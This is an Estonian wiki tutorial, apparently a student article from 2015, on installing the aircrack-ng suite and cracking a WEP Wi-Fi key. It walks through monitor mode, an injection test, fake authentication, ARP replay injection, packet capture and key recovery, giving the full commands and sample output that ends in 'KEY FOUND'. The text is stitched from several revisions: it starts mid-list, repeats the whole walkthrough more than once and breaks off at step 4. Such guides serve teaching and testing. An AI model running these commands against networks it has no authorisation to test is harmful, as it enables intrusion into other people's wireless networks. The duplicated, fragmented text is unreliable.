2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==
 

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi''' 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liidese:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>

Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval '''airmon-ng stop athX''' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

Pane tähele! Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav airmon-ng stop ath0 käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raaiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

Pane tähele! “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

Kontrolli: Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile''' 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:
-9 - “süstimise” test
-e teddy – raadiovõrgu nimi
-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress
ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

Pane tähele! Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
 
 
'''Samm 3: Avada airodump-ng pakettide püüdmiseks''' 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:
-c 9 – raadiovõrgu kanal
--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühendud
-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>
 
 
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga''' 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

''Selgitus:
-1 – võlts autentimine
0 – kordusühendus(t)e aeg sekundites
-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)
Ebaõnnestumise korral on tulemus:
8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
 
 
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis''' 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>
 
 
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks''' 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub
output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

=Kasutatud kirjandus=
<references/>

=Autor(id)=

Kelly Tragel [ISa 21]
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
<tr>
<td> </td>
<td> </td>
</tr>
<tr>
<td> </td>
<td> </td>
</tr>
<tr>
</table>

Aircrack

2015-05-25T19:13:33Z

Ktragel:

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit.

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. </div>

=Üldkirjeldus=

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.
 
 
==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume:
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==
 
 

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi''' 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liidese:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>

Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval '''airmon-ng stop athX''' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

Pane tähele! Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav airmon-ng stop ath0 käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raaiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

Pane tähele! “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

Kontrolli: Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile''' 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:
-9 - “süstimise” test
-e teddy – raadiovõrgu nimi
-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress
ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

Pane tähele! Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.

'''Samm 3: Avada airodump-ng pakettide püüdmiseks''' 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:
-c 9 – raadiovõrgu kanal
--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühendud
-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>

'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga''' 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>
''
Selgitus:
-1 – võlts autentimine
0 – kordusühendus(t)e aeg sekundites
-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)
Ebaõnnestumise korral on tulemus:
8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>

'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis''' 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>

'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks''' 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub
output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

=Kasutatud kirjandus=
<references/>

=Autor(id)=

Kelly Tragel [ISa 21]
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
<tr>
<td> </td>
<td> </td>
</tr>
<tr>
<td> </td>
<td> </td>
</tr>
<tr>
</table>

Aircrack

2015-05-25T19:12:49Z

Ktragel:

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit.

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. </div>

=Üldkirjeldus=

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.
 
 
==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume:
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi''' 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liidese:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>

Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval '''airmon-ng stop athX''' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

Pane tähele! Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav airmon-ng stop ath0 käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raaiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

Pane tähele! “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

Kontrolli: Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
'''
Samm 2: Testime „süstimise“ suutlikkust pääsupunktile''' 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:
-9 - “süstimise” test
-e teddy – raadiovõrgu nimi
-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress
ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

Pane tähele! Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.

'''Samm 3: Avada airodump-ng pakettide püüdmiseks''' 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:
-c 9 – raadiovõrgu kanal
--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühendud
-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>

'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga''' 
